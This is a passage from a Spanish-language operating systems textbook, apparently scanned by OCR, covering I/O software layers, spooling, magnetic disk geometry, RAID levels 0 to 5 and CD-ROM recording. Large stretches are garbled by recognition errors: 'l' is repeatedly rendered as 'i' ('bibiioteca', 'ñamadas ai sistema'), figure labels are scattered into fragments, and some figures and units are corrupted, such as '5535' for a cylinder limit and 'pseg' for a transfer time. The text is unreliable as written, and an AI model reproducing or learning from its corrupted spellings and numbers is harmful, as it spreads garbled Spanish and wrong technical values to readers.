ñado o tratar de leer de una cámara de video que está apagada. En estas circunstancias depende del 
controlador determinar qué hacer. Si el controlador no sabe qué hacer, puede pasar el problema de 
vuelta al software independiente del dispositivo. 

Lo que hace este software depende del entorno y la naturaleza del error. Si se trata de un error 
simple de lectura y hay un usuario interactivo disponible, puede mostrar un cuadro de diálogo pidien¬ 
do al usuario lo que debe hacer. Las opciones pueden incluir volver a intentar cierto número de ve¬ 
ces, ignorar el error o eliminar el proceso que hizo la llamada. Si no hay usuario disponible, tal vez 
la única opción real sea hacer que la llamada al sistema falle con un código de error. 

Sin embargo, algunos errores no se pueden manejar de esta forma. Por ejemplo, una estructu¬ 
ra de datos crítica, como el directorio raíz o la lista de bloques libres, puede haberse destruido. En 
este caso, el sistema tal vez tenga que mostrar un mensaje de error y terminar. 


Asignación y liberación de dispositivos dedicados 

Algunos dispositivos, como los grabadores de CD-ROM , sólo pueden ser utilizados por un solo 
proceso en un momento dado. Es responsabilidad del sistema operativo examinar las peticiones de 
uso de los dispositivos y aceptarlas o rechazarlas, dependiendo de si el dispositivo solicitado está 
o no disponible. Una manera simple de manejar estas peticiones es requerir que los procesos rea¬ 
licen llamadas a open en los archivos especiales para los dispositivos directamente. Si el disposi¬ 
tivo no está disponible, la llamada a open falla. Al cerrar un dispositivo dedicado de este tipo se 
libera. 

Un método alternativo es tener mecanismos especiales para solicitar y liberar dispositivos de¬ 
dicados. Un intento por adquirir un dispositivo que no está disponible bloquea al proceso que hizo 
la llamada, en vez de fallar. Los procesos bloqueados se ponen en una cola. Tarde o temprano, el 
dispositivo solicitado estará disponible y el primer proceso en la cola podrá adquirirlo para conti¬ 
nuar su ejecución. 


Tamaño de bloque independiente del dispositivo 

Los distintos discos pueden tener diferentes tamaños de sectores. Es responsabilidad del software 
independiente del dispositivo ocultar este hecho y proporcionar un tamaño de bloque uniforme a los 
niveles superiores: por ejemplo, al tratar varios sectores como un solo bloque lógico. De esta 
forma, los niveles superiores lidian sólo con dispositivos abstractos que utilizan todos el mismo 
tamaño de bloque lógico, sin importar el tamaño del sector físico. De manera similar, algunos dis¬ 
positivos de carácter envían sus datos un byte a la vez (como los módems), mientras que otros en¬ 
vían sus datos en unidades más grandes (como las interfaces de red). Estas diferencias también se 
pueden ocultar. 
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5.3.4 Software de E/S en espacio de usuario 

A unque la mayor parte del software de E/S está dentro del sistema operativo, una pequeña porción 
de éste consiste en bibiiotecas vincuiadas entre sí con programas de usuario, e inciuso programas 
enteros que se ejecutan desde ei exterior dei kernei. Las ñamadas ai sistema, inciuyendo ias ñama¬ 
das ai sistema de E/S, se reaiizan comúnmente mediante procedimientos de bibñoteca. Cuando un 
programa en C contiene i a ñamada 

cuenta =write(da, bufer, nbytes); 

ei procedimiento de bibiioteca write se vincuiará con ei programa y se inciuirá en ei programa bi¬ 
nario presente en memoria en tiempo de ejecución. La coiección de todos estos procedimientos de 
bibiioteca es sin duda parte dei sistema de E/S. 

Aunque estos procedimientos hacen aigo más que coiocar sus parámetros en ei iugar apropia¬ 
do para ia ñamada ai sistema, hay otros procedimientos de E/S que en reaiidad reaiizan un trabajo 
reai. En especiai, ei formato de ia entrada y ia saiida seiieva a cabo mediante procedimientos de bi¬ 
biioteca. Un ejempio deC es printf, que toma una cadena de formato y posibiementeunas variabies 
como entrada, construye una cadena ASCII y después llama al sistema write para imprimir la ca¬ 
dena. Como ejemplo de printf, considere la instrucción 

printf("EI cuadrado de %3d es %6d\n”, i, i*i); 

Esta instrucción da formato a una cadena que consiste en la cadena de 14 caracteres "El cuadrado 
de" seguida por el valor i como una cadena de 3 caracteres, después la cadena de 4 caracteres "es", 
luego i^ como seis caracteres, y por último un salto de línea. 

Un ejemplo de un procedimiento similar para la entrada es scanf, que lee los datos de entrada 
y los almacena en variables descritas en una cadena de formato que utiliza la misma sintaxis que 
printf. La biblioteca de E/S estándar contiene varios procedimientos que involucran operaciones de 
E/S y todos se ejecutan como parte los programas de usuario. 

No todo el software de E/S de bajo nivel consiste en procedimientos de biblioteca. Otra cate¬ 
goría importante es el sistema de colas. El uso de colas (spooling) es una manera de lidiar con los 
dispositivos de E/S dedicados en un sistema de multiprogramación. Considere un dispositivo co¬ 
mún que utiliza colas: una impresora. Aunque sería técnicamente sencillo dejar que cualquier pro¬ 
ceso de usuario abriera el archivo de caracteres especial para la impresora, suponga que un proceso 
lo abriera y no hiciera nada durante horas. Ningún otro proceso podría imprimir nada. 

En vez de ello, lo que se hace es crear un proceso especial, conocido como demonio, y un di¬ 
rectorio especial llamado directorio de cola de impresión. Para imprimir un archivo, un proceso 
genera primero todo el archivo que va a imprimir y lo coloca en el directorio de la cola de impre¬ 
sión. Es responsabilidad del demonio, que es el único proceso que tiene permiso para usar el archi¬ 
vo especial de la impresora, imprimir los archivos en el directorio. Al proteger el archivo especial 
contra el uso directo por parte de los usuarios, se elimina el problema de que alguien lo mantenga 
abierto por un tiempo innecesariamente extenso. 

El uso de colas no es exclusivo de las impresoras. También se utiliza en otras situaciones de 
E/S. Por ejemplo, la transferencia de archivos a través de una red utiliza con frecuencia un demo¬ 
nio de red. Para enviar un archivo a cierta parte, un usuario lo coloca en un directorio de la cola de 
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red. M ás adelante, el demonio de red lo toma y lo transmite. U n uso específico de la transmisión de 
archivos mediante el uso de una cola es el sistema de noticias USENET. Esta red consiste en millo¬ 
nes de máquinas en todo el mundo, que se comunican mediante Internet. Existen miles de grupos 
de noticias sobre muchos temas. Para publicar un mensaje, el usuario invoca a un programa de no¬ 
ticias, el cual acepta el mensaje a publicar y luego lo deposita en un directorio de cola para trans¬ 
mitirlo a las otras máquinas más adelante. Todo el sistema de noticias se ejecuta fuera del sistema 
operativo. 

En la figura 5-17 se resume el sistema de E/S, donde se muestran todos los niveles y las fun¬ 
ciones principales de cada nivel. Empezando desde la parte inferior, los niveles son el hardware, los 
manejadores de interrupciones, los controladores de dispositivos, el software independiente del dis¬ 
positivo y, por último, los procesos de usuario. 


Respuesta 

Nivel / de E/S Funciones de E/S 


Hacer la llamada de E/S; aplicar formato a la E/S; poner en cola 


Nombramiento, protección, bloqueo, uso de búfer, asignación 


Establecer los registros de dispositivo; verificar el estado 


Despertar el controlador cuando se completa la E/S 


Realizar operación de E/S 


Figura 5-17. N iveles del sistema de E/S y las funciones principales de cada nivel. 

Las flechas en la figura 5-17 muestran el flujo de control. Por ejemplo, cuando un programa de 
usuario trata de leer un bloque de un archivo, se invoca el sistema operativo para llevar a cabo la 
llamada. El software independiente del dispositivo busca el bloqueen la caché del búfer, por ejem¬ 
plo. Si el bloque necesario no está ahí, llama al controlador del dispositivo para enviar la petición 
al hardware y obtenerlo del disco. Después, el proceso se bloquea hasta que se haya completado la 
operación de disco. 

Cuando termina el disco, el hardware genera una interrupción. El manejador de interrupciones 
se ejecuta para descubrir qué ocurrió: es decir, qué dispositivo desea atención en ese momento. Des¬ 
pués extrae el estado del dispositivo y despierta al proceso inactivo para que termine la petición de 
E/S y deje que el proceso de usuario continúe. 


Petición 
de E/S 


Procesos de usuario 


y 


'Software independiente 
I dei dispositivo i 


Controiadores de 
dispositivos 


Manejadores de 
interrupciones | 

Hardware 


5.4 DISCOS 

Ahora vamos a estudiar algunos dispositivos de E/S reales. Empezaremos con los discos, que en 
concepto son simples, pero muy importantes. Después examinaremos los relojes, los teclados y las 
pantallas. 
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5.4.1 H ardware de disco 

Los discos son de vari os ti pos. Los más comunes son ios discos magnéticos (discos duros y fiexibies). 
Se caracterizan por ei hecho de que ias operaciones de iectura y escritura son iguai de rápidas, io que 
ios hace ideaies como memoria secundaria (como paginación o sistemas de archivos, por ejempio). 
Aigunas veces se utiiizan arregios de estos discos para ofrecer un aimacenamiento aitamente confia- 
bie. Para ia distribución de programas, datos y peiícuias, son también importantes varios tipos de dis¬ 
cos ópticos (CD-ROM s, CD-grababiey DVD). En ias siguientes secciones describiremos primero ei 
hardware y iuego ei software para estos dispositivos. 


Discos magnéticos 

Los discos magnéticos se organizan en ciiindros, cada uno de ios cuaies contiene tantas pistas co¬ 
mo cabezas apiiadas en forma verticai. Las pistas se dividen en sectores. Ei número de sectores ai- 
rededor de ia circunferencia es por io generai de 8 a 32 en ios discos fiexibies, y hasta varios cientos 
en ios discos duros. Ei número de cabezas varía entre 1 y 16. 

Los discos antiguos tienen pocos componentes eiectrónieos y sóio producen un fiujo de bits se- 
riai simpie. En estos discos ei controi ador reai iza ia mayor parte dei trabajo. En otros discos, en es- 
peciai ios discos IDE (Electrónica de Unidad Integrada) y SATA (ATA Serial), ia unidad de 
disco contiene un microcontroiadorquereaiiza un trabajo considerabiey permite ai controiador reai 
emitir un conjunto de comandos de nivei superior. A menudo ei controiador coioca ias pistas en ca¬ 
ché, reasigna ios bioques defectuosos y mucho más. 

Una característica de dispositivo que tiene impiicaciones importantes para ei software contro¬ 
iador dei disco es ia posibiiidad de que un controiador reaiiee búsquedas en dos o más unidades ai 
mismo tiempo. Éstas se conocen como búsquedas traslapadas. M ientras ei controiador y ei soft¬ 
ware esperan a que se compiete una búsqueda en una unidad, ei controiador puede iniciar una bús¬ 
queda en otra unidad. M uchos controiadores también pueden ieer o escribir en una unidad mientras 
buscan en otra u otras unidades, pero un controiador de disco fiexibie no puede ieer o escribir en 
dos unidades ai mismo tiempo (para ieer o escribir, ei controiador tiene que despiezar bits en una 
escaia de tiempo en microsegundos, por io que una transferencia ocupa ia mayor parte de su poder 
de cómputo). Esta situación es distinta para ios discos duros con controiadores integrados, y en un 
sistema con más de una de estas unidades de disco duro pueden operar de manera simuitánea, ai 
menos en cuanto a ia transferencia de datos entre ei disco y ia memoria de búfer dei controiador. 
Sin embargo, sóio es posibie una transferencia entre ei controiador y ia memoria principai. La ca¬ 
pacidad de reaiizar dos o más operaciones ai mismo tiempo puede reducir ei tiempo de acceso pro¬ 
medio de manera consi derabie. 

En ia figura 5-18 se comparan ios parámetros dei medio de aimacenamiento estándar para ia 
IBM PC original con los parámetros de un disco fabricado 20 años después, para mostrar cuánto 
han cambiado los discos en 20 años. Es interesante observar que no todos los parámetros han me¬ 
jorado tanto. El tiempo de búsqueda promedio es siete veces mejor de lo que era antes, la veloci¬ 
dad de transferencia es 1300 veces mejor, mientras que la capacidad aumentó por un factor de 
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50,000. Este patrón está relacionado con las mejoras relativamente graduales en las piezas móviles, 
y densidades de bits mucho mayores en las superficies de grabación. 


Parámetro 

Disco flexible IBM de 360-KB 

Disco duro WD 18300 

Número de cilindros 

40 

10601 

Pistas por cilindro 

2 

12 

Sectores por pista 

9 

281 (promedio) 

Sectores por disco 

720 

35742000 

Bytes por sector 

512 

512 

Capacidad del disco 

360 KB 

18.3 GB 

Tiempo de búsqueda (cilindros adyacentes) 

6 mseg 

0.8 mseg 

Tiempo de búsqueda (caso promedio) 

77 mseg 

6.9 mseg 

Tiempo de rotación 

200 mseg 

8.33 mseg 

Tiempo de arranque/paro del motor 

250 mseg 

20 seg 

Tiempo para transferir 1 sector 

22 mseg 

17 pseg 


Figura 5-18. Parámetros de disco para el disco flexible IB M PC 360 K B original y un 
disco duro Western Digital W D 18300. 


Algo que debemos tener en cuenta al analizar las especificaciones de los discos duros moder¬ 
nos es que la geometría especificada y utilizada por el controlador es casi siempre distinta a la del 
formato físico. En los discos antiguos, el número de sectores por pista era el mismo para todos los 
cilindros. Los discos modernos se dividen en zonas, con más sectores en las zonas exteriores que 
en las interiores. La figura 5-19(a) ilustra un pequeño disco con dos zonas. La zona exterior tiene 
32 sectores por pista; la interior tiene 16 sectores por pista. Un disco real, como el WD 18300, tie¬ 
ne por lo general 16 o más zonas, y el número de sectores se incrementa aproximadamente 4% por 
zona, a medida que se avanza desde la zona más interior hasta la más exterior. 

Para ocultar los detalles sobre cuántos sectores tiene cada pista, la mayoría de los discos mo¬ 
dernos tienen una geometría virtual que se presenta al sistema operativo. Se instruye al software pa¬ 
ra que actúe como si hubiera x cilindros, y cabezas y z sectores por pista. Después el controlador 
reasigna una petición para (x, y, z) a los valores reales de cilindro, cabeza y sector. Una posible geo¬ 
metría virtual para el disco físico de la figura 5-19(a) se muestra en la figura 5-19(b). En ambos ca¬ 
sos el disco tiene 192 sectores, sólo que el arreglo publicado es distinto del real. 

Para las PCs, los valores máximos para estos parámetros son a menudo 5535, 16 y 63, debido 
a la necesidad de tener compatibilidad hacia atrás con las limitaciones de la IBM PC original. En 
esta máquina se utilizaron campos de 16, 4 y 6 bits para especificar estos números, donde los cilin¬ 
dros y sectores enumerados empiezan en 1 y las cabezas enumeradas empiezan en 0. Con estos pa¬ 
rámetros y 512 bytes por sector, el disco más grande posible es de 31.5 GB. Para sobrepasar este 
límite, todos los discos modernos aceptan ahora un sistema llamado direccionamiento de bloques 
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Figura 5-19. (a) Geometría física de un disco con dos zonas, (b) U na posibie geome¬ 
tría virtuai para este disco. 


lógicos, en el que los sectores de disco sólo se enumeran en forma consecutiva empezando en 0, sin 
importar la geometría del disco. 

RAID 

El rendimiento de la CPU ha crecido en forma exponencial durante la década pasada, y se duplica 
aproximadamente cada 18 meses. No pasa lo mismo con el rendimiento del disco. En la década de 
1970, los tiempos de búsqueda promedio en los discos de minicomputadoras eran de 50 a 100 mseg; 
ahora están ligeramente por debajo de 10 mseg. En la mayoría de las industrias técnicas (por ejem¬ 
plo, automóviles o aviación), un factor del 5 a 10 en cuanto a la mejora del rendimiento en dos dé¬ 
cadas serían grandes noticias (imagine autos de 300 millas por galón), pero en la industria de las 
computadoras es una vergüenza. Por ende, la brecha entre el rendimiento delaCPU y el rendimien¬ 
to del disco se ha vuelto mucho mayor con el tiempo. 

Como hemos visto, el procesamiento en paralelo se utiliza cada vez más para agilizar el rendi¬ 
miento de la CPU. Con el paso de los años, a varias personas se les ha ocurrido que la E/S en para¬ 
lelo podría ser una buena idea también. En su artículo de 1988, Patterson y colaboradores sugirieron 
seis organizaciones de discos específicas que se podrían utilizar para mejorar el rendimiento del dis¬ 
co, su confiabilidad o ambas características (Patterson y colaboradores, 1988). Estas ideas fueron 
adoptadas de inmediato por la industria y han conllevado a una nueva clase de dispositivo de E/S co¬ 
nocido como RAID. Patterson y sus colaboradores definieron RAID como Arreglo Redundante de 
DiscosEconóniicos(Redundant Array of Inexpensive Disks), pero la industria redefinió la I para que 
indicara "Independiente" en vez de "económico" (¿tal vez para que pudieran cobrar más?). Como 
también se necesitaba un villano (como en RISC contra CISC, también debido a Patterson), el tipo 
malo aquí era SLED (Single Large Expensive Disk, Un solo disco grande y costoso). 
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La idea básica detrás de un RAID es instalar una caja llena de discos a un lado de la compu¬ 
tadora (que por lo general es un servidor grande), reemplazar la tarjeta controladora de discos con 
un controlador RAID, copiar los datos al RAID y después continuar la operación normal. En otras 
palabras, un RAID se debe ver como un SLED para el sistema operativo, pero con mejor rendi¬ 
miento y confiabilidad. Como los discos SCSI tienen un buen rendimiento, bajo costo y la capa¬ 
cidad detener hasta siete unidades en un solo controlador (15 para SCSI amplio), es natural que 
la mayoría de los RAIDs consistan en un controlador RAID SCSI más una caja de discos SCSI 
que el sistema operativo considere como un solo disco grande. De esta forma no se requieren cam¬ 
bios en el software para utilizar el RAID; un gran punto de venta para muchos administradores de 
sistemas. 

Además de aparecer como un solo disco para el software, todos los RAIDs tienen la propiedad 
deque los datos se distribuyen entre las unidades, para permitir la operación en paralelo. Patterson 
y sus colaboradores definieron varios esquemas distintos para hacer esto, y ahora se conocen como 
RAID nivel 0 hasta RAID nivel 5. Además hay unos cuantos niveles menores que no analizaremos. 
El término "nivel" es algo equivocado, debido a que no hay una jerarquía involucrada: simplemen¬ 
te son seis organizaciones distintas posibles. 

El nivel RAID 0 se ilustra en la figura 5-20(a). Consiste en ver el disco virtual simulado por 
el RAID como si estuviera dividido en bandas de k sectores cada una, en donde los sectores 0 a 
k - 1 son la banda 0, los sectores k a 2k - 1 son la banda 1, y así en lo sucesivo. Para k = 1, ca¬ 
da banda es un sector; para k = 2, una banda es de dos sectores, etc. La organización RAID de 
nivel 0 escribe bandas consecutivas sobre las unidades utilizando el método por turno rotatorio 
(round-robin), como se muestra en la figura 5-20(a) para un RAID con cuatro unidades de disco. 

Al proceso de distribuir datos sobre varias unidades de esta forma se le conoce como repar¬ 
to de bloques (striping). Para cada ejemplo, si el software emite un comando para leer un blo¬ 
que de datos de cuatro bloques consecutivos que empieza en un límite de bloque, el controlador 
RAID descompondrá este comando en cuatro comandos separados, uno para cada uno de los cua¬ 
tro discos, y hará que operen en paralelo. Así, tenemos E/S en paralelo sin que el software lo 
sepa. 

El nivel 0 de RAID funciona mejor con las peticiones grandes: entre mayores sean, mejor. Si 
una petición es mayor que el número de unidades multiplicado por el tamaño de los bloques, algu¬ 
nas unidades obtendrán varias peticiones, por lo que cuando terminen la primera petición empeza¬ 
rán la segunda. Es responsabilidad del controlador dividir la petición y alimentar los comandos 
apropiados a los discos apropiados en la secuencia correcta, y después ensamblar correctamente los 
resultados en la memoria. El rendimiento es excelente y la implementación sencilla. 

El nivel 0 deAID funciona peor con los sistemas operativos que habitual mente piden datos un 
sector a la vez. Los resultados serán correctos pero no hay paralelismo, y por ende no aumenta el 
rendimiento. Otra desventaja de esta organización es que la confiabilidad es potencial mente peor 
que tener un SLED. Si RAID consiste de cuatro discos, cada uno con un tiempo de falla promedio 
de 20,000 horas, una vez cada 5,000 fallará una unidad y los datos se perderán por completo. Un 
SLED con un tiempo promedio de falla de 20,000 horas será cuatro veces más confiable. Como no 
hay redundancia presente en este diseño, en realidad no es un verdadero RAID. 

La siguiente opción, el nivel 1 de RAID que se muestra en la figura 5-20(b), es un RAID ver¬ 
dadero. Duplica todos los discos, por lo que hay cuatro discos primarios y cuatro discos de respal- 
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do. En una operación de escritura cada bioque se escribe dos veces. En una iectura se puede utiii- 
zar cuaiquiera de ias copias, con io que se distribuye ia carga entre más unidades. En consecuencia, 
ei rendimiento de escritura no es mejor que para una soia unidad, pero ei rendimiento de iectura 
puede ser de hasta ei dobie. La toierancia a faiias es exceiente: si una unidad faiia, simpiemente se 
utiiiza ia copia. La recuperación consiste tan sóio en instaiar una nueva unidad y copiar toda ia uni¬ 
dad de respaido en eiia. 

A diferencia de ios niveies 0 y 1, que funcionan con bandas de sectores, ei nivei 2 de RAID 
funciona por paiabra, tai vez hasta por byte. Imagine dividir cada byte dei disco virtuai en un par 
de medios bits (nibbies de 4 bits), y después agregar un código de Hamming a cada uno para for¬ 
mar una paiabra de 7 bits, de ia cuai ios bits 1, 2 y 4 son bits de paridad. Imagine que ias siete uni¬ 
dades de ia figura 5-20(c) se sincronizan en términos de ia posición dei brazo y de ia posición 
rotacionai. Entonces sería posibie escribir ia paiabra con código Hamming de 7 bits sobre ias siete 
unidades, un byte por unidad. 

La computadora Thinking M achines CM -2 utiiizaba este esquema. Tomaba paiabras de datos 
de 32 bits y agregaba 6 bits de paridad para formar una paiabra de Hamming de 38 bits, más un bit 
adicionai para ia paridad de paiabra, y esparcía cada paiabra sobre 39 unidades de disco. La tasa de 
transferencia totai era inmensa, ya que en un tiempo de sector podía escribir 32 sectores de datos. 
Además, ai perder un disco no había probiemas, ya que significaba perder 1 bit en cada iectura de 
paiabra de 39 bits, aigo que ei código de Hamming soiucionaría ai instante. 

Por ei iado negativo, este esquema requiere que todas ias unidades se sincronicen en forma ro¬ 
tacionai, y sóio tiene sentido con un número considerabie de unidades (inciuso con 32 unidades de 
datos y 6 unidades de paridad, ia sobrecarga es de 19%). También exige mucho ai controiador, ya 
que debe reaiizar una suma de comprobación de Hamming por cada tiempo de bit. 

Ei nivei 3 de RAID es una versión simpiificadadei nivei 2 de RAID. Se ilustra en la figura 5-20(d). 
Aquí se calcula un solo bit de paridad para cada palabra de datos y se escribe en una unidad de pari¬ 
dad. Al igual que en el nivel 2 de RAID, las unidades deben tener una sincronización exacta, ya que las 
palabras de datos individuales están distribuidas a través de varias unidades. 

En primera instancia, podría parecer que un solo bit de paridad proporciona sólo detección, y 
no corrección de errores. Para el caso de los errores aleatorios no detectados, esta observación es 
verdadera. Sin embargo, para el caso de la falla de una unidad, proporciona corrección de error de 
1 bit debido a que la posición del bit defectuoso se conoce. Si una unidad falla, el controlador sólo 
simula que todos sus bits son 0; si una palabra tiene un error de paridad, el bit de la unidad defec¬ 
tuosa debe haber sido 1, por lo que se corrige. Aunque los niveles 2 y 3 de RAID ofrecen velocida¬ 
des de transferencia de datos muy altas, el número de peticiones de E/S separadas que pueden 
manejar por segundo no es mayor que para una sola unidad. 

Los niveles 4 y 5 de RAID funcionan con bloques otra vez, no con palabras individuales con 
paridad, y no requieren unidades sincronizadas. El nivel 4 de RAID [véase la figura 5-20(e)] es co¬ 
mo el nivel 0, en donde se escribe una paridad banda por banda en una unidad adicional. Por ejem¬ 
plo, si cada banda es de k bytes, se aplica un OR EXCLUSIVO a todos los bloques y se obtiene 
como resultado un bloque de paridad de k bytes. Si una unidad falla, los bytes perdidos se pueden 
recalcular a partir del bit de paridad, leyendo el conjunto completo de unidades. 

Este diseño protege contra la pérdida de una unidad, pero tiene un desempeño pobre para las 
actualizaciones pequeñas. Si se cambia un sector, es necesario leer todas las unidades para poder re- 


366 


ENTRADA/SALIDA 


CAPITULO 5 


(a) 


Bloque 0 
Bloque 4 
Bloque 


Bloque 1 
Bloque 5 
Bloque 9 


Bloque 2 
Bloque 6 
Bloque 10 


Bloque 3 
Bloque 7 
Bloque 11 


RAID nivel 0 


(b) 


Bloque 0 
Bloque 4 
Bloque 


Bloque 1 
Bloque 5 
Bloque 9 


Bloque 2 
Bloque 6 
Bloque 10 


Bloque 3 
Bloque 7 
Bloque 11 


Bloque 0 
Bloque 4 
Bloque 


Bloque 1 
Bloque 5 
Bloque 9 


Bloque 2 
Bloque 6 
Bloque 10 


Bloque 3 
Bloque 7 
Bloque 11 


RAID 
nivel 1 


(O 


Bill 



Blt3 


Blt4 


Bits 


Bit 6 


Blt7 


RAID nivel 2 



RAID nivel 3 


(e) 


Bloque 0 
Bloque 4 
Bloque 8 


Bloque 1 
Bloque 5 
Bloque 9 


Bloque 2 
Bloque 6 
Bloque 10 


Bloque 3 
Bloque 7 
Bloque 11 



RAID nivel 4 


(f) 


Bloque 0 
Bloque 4 
Bloque 8 
Bloque 12 
P16-19 



Bloque 3 
P4-7 
Bloque 10 
Bloque 14 
Bloque 18 



RAID nivel 5 


Figura 5-20. Niveles 0 a 5 de RAID. Las unidades de respaldo y de paridad se mues¬ 
tran sombreadas. 
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calcular la paridad, que entonces se debe volver a escribir. De manera alternativa, puede leer los 
datos antiguos del usuario y los datos antiguos de paridad, y recalcular la nueva paridad a partir 
de ellos. Incluso con esta optimización, una pequeña actualización requiere dos lecturas y dos es¬ 
crituras 

Como consecuencia de la pesada carga en la unidad de paridad, puede convertirse en un cuello 
de botella. Éste se elimina en el nivel 5 de RAID al distribuir los bits de paridad de manera unifor¬ 
me sobre todas las unidades, por turno rotatorio (round-robin), como se muestra en la figura 5-20(f). 
Sin embargo, en caso de una falla de unidad, la reconstrucción del contenido de la unidad fallida es 
un proceso complejo. 

CD-ROMs 

En años recientes se han empezado a utilizar los discos ópticos (en contraste a los magnéticos). Es¬ 
tos discos tienen densidades de grabación mucho más altas que los discos magnéticos convencio¬ 
nales. Los discos ópticos se desarrollaron en un principio para grabar programas de televisión, pero 
se les puede dar un uso más estético como dispositivos de almacenamiento de computadora. Debi¬ 
do a su capacidad potencial mente enorme, los discos ópticos han sido tema de una gran cantidad de 
investigación y han pasado por una evolución increíblemente rápida. 

Los discos ópticos de primera generación fueron inventados por el conglomerado de electróni¬ 
ca holandés Philips, para contener películas. Tenían 30 centímetros de diámetro y se comercializa¬ 
ron bajo el nombre LaserVision, pero no tuvieron mucha popularidad, excepto en japón. 

En 1980, Philips y Sony desarrollaron el CD (Disco Compacto), que sustituyó rápidamente al 
disco de vinilo de 33 1/3 RPM que se utilizaba para música (excepto entre los conocedores, que 
aún preferían el vinilo). Los detalles técnicos precisos para el CD se publicaron en un Estándar In¬ 
ternacional oficial (IS 10149) conocido popularmente como el Libro rojo debido al color de su 
portada (los Estándares Internacionales son emitidos por la Organización Internacional de Están¬ 
dares, que es la contraparte internacional délos grupos de estándares nacionales como A N SI, DI N, 
etc. Cada uno tiene un número IS). El punto de publicar las especificaciones de los discos y las 
unidades como un estándar internacional tiene como fin permitir que los CDs de distintas compa¬ 
ñías disqueras y los reproductores de distintos fabricantes electrónicos puedan funcionar en con¬ 
junto. Todos los CDs tienen 120 mm de diámetro y 1.2 mm de grosor, con un hoyo de 15 mm en 
medio. El CD deaudiofueel primer medio de almacenamiento digital masivo en el mercado. Se 
supone que deben durar 100 años. Por favor consulte de nuevo en el 2080 para saber cómo le fue 
al primer lote. 

Un CD se prepara en varios pasos. El primero consiste en utilizar un láser infrarrojo de alto po¬ 
der para quemar hoyos de 0.8 micrones de diámetro en un disco maestro con cubierta de vidrio. A 
partir de este disco maestro se fabrica un molde, con protuberancias en lugar délos hoyos del láser. 
En este molde se inyecta resina de policarbonato fundido para formar un CD con el mismo patrón 
de hoyos que el disco maestro de vidrio. Después se deposita una capa muy delgada de aluminio 
reflectivo en el policarbonato, cubierta por una laca protectora y finalmente una etiqueta. Las de¬ 
presiones en el sustrato de policarbonato se llaman hoyos (pits); las áreas no quemadas entre los ho¬ 
yos se llaman áreas lisas (lands). 
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Cuando se reproduce, un diodo láser de baja energía emite luz infrarroja con una longitud de on¬ 
da de 0.78 micrones sobre los hoyos y áreas lisas a medida que van pasando. El láser está del lado del 
policarbonato, por lo que los hoyos salen hacia el láser como protuberancias en la superficie de área 
lisa. Como los hoyos tienen una altura de un cuarto de la longitud de onda de la luz del láser, la luz 
que se refleja de un hoyo está desfasada por media longitud de onda con la luz que se refleja de la su¬ 
perficie circundante. Como resultado, las dos partes interfieren en forma destructiva y devuelven me¬ 
nos luz al fotodetector del reproductor que la luz que rebota de un área lisa. Así es como el reproductor 
puede diferenciar un hoyo de un área lisa. Aunque podría parecer más simple utilizar un hoyo para 
grabar un 0 y un área lisa para grabar un 1, es más confiable utilizar una transición de hoyo a área li¬ 
sa o de área lisa a un hoyo para un 1 y su ausencia como un 0, por lo que se utiliza este esquema. 

Los hoyos y las áreas lisas se escriben en una sola espiral continua, que empieza cerca del ho¬ 
yo y recorre una distancia de 32 mm hacia el borde. La espiral realiza 22,188 revoluciones alrede¬ 
dor del disco (aproximadamente 600 por milímetro). Si se desenredara, tendría 5.6 km de largo. La 
espiral se ilustra en la figura 5-21. 



Figura 5-21. Estructura de grabación de un disco compacto o CD-ROM . 

Para reproducir la música a una velocidad uniforme, es necesario un flujo continuo de hoyos y 
áreas a una velocidad lineal constante. En consecuencia, la velocidad de rotación del CD se debe 
reducir en forma continua a medida que la cabeza de lectura se desplaza desde la parte interna del 
CD hacia la parte externa. En el interior la velocidad de rotación es de 530 RPM para lograr la ve¬ 
locidad de flujo continuo deseada de 120 cm/seg; en el exterior tiene que reducirse a 200 RM P pa¬ 
ra proporcionar la misma velocidad lineal en la cabeza. Una unidad de velocidad lineal constante 
es muy distinta a una unidad de disco magnético, que opera a una velocidad angular constante, sin 
importar dónde se encuentre la cabeza en un momento dado. Además, 530 RPM están muy lejos de 
las 3600 a 7200 RPM a las que giran la mayoría de los discos magnéticos. 

En 1984, Philips y Sony se dieron cuenta del potencial de utilizar CDs para almacenar datos de 
computadora, por lo cual publicaron el Libro amarillo que define un estándar preciso para lo que 
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se conoce ahora como CD-ROMs (Compact disk-read oniy memory, Disco compacto-memoria 
de sóio iectura). Para apoyarse en ei mercado de CDs de audio, que para ese entonces ya era con- 
siderabie, ios CD-ROM s tenían queser dei mismo tamaño físico que ios CDs de audio, ser compa- 
tibies en sentido mecánico y óptico con eiios, y se debían producir utiiizando ias mismas máquinas 
de moideado por inyección de poi i carbonato. Las consecuencias de esta decisión fueron que no só¬ 
io se requerían motores ientos de veiocidad variabie, sino también que ei costo de fabricación de un 
CD-ROM estaría muy por debajo de un dóiar en un voiumen moderado. 

Lo que definió ei Libro amariiio fue ei formato de ios datos de computadora. También mejoró 
ias habiiidades de corrección de errores dei sistema, un paso esenciai pues aunque a ios amantes de 
ia música no Íes importaba perder un poco aquí y aiiá, ios amantes de ias computadoras tendían a 
ser M uy Exigentes en cuanto a eso. Ei formato básico de un CD-ROM consiste en codificar cada 
byte en un símboio de 14 bits, que es suficiente como para usar ei código de Hamming en un byte 
de 8 bits con 2 bits de sobra. De hecho, se utiiiza un sistema de codificación más potente. La asig¬ 
nación de 14 a 8 para ia iectura se reaiiza en ei hardware mediante ia búsqueda en una tabia. 

En ei siguiente nivei hacia arriba, un grupo de 42 símboios consecutivos forma una estructu¬ 
ra de 588 bits. Cada estructura contiene 192 bits de datos (24 bytes). Los 396 bits restantes se uti- 
iizan para corrección y controi de errores. De éstos, 252 son ios bits de corrección de errores en ios 
símboios de 14 bits, y 144 se iievan en ias transmisiones de símboios de 8 bits. Hasta ahora, este 
esquema es idéntico para ios CDs de audio y ios CD-ROM s. 

Lo que agrega ei Libro amariiio es ei agrupamiento de 98 estructuras en un sector de 
CD-ROM, como se muestra en ia figura 5-22. Cada sector dei CD-ROM empieza con un preám- 
buio de 16 bytes, dei cuai ios primeros 12 son OOFFFFFFFFFFFFFFFFFFFFOO (hexadecimai) pa¬ 
ra permitir que ei reproductor reconozca ei inicio de un sector de CD-ROM . Los siguientes 3 bytes 
contienen ei número de sector, que se requiere debido a que es mucho más difícii reaiizar búsque¬ 
das en un CD-ROM con una soia espirai de datos que en un disco magnético, con sus pistas con¬ 
céntricas uniformes. Para buscar, ei software en ia unidad caicuia aproximadamente a dónde debe 
ir, despieza ahí ia cabeza y después empieza a buscar un preámbuio para ver qué tan buena fue su 
aproximación. Ei úitimo byte dei preámbuio es ei modo. 


1 = 11 = 11=1 Cada símbolo contiene 8 bits de datos y 6 bits de 
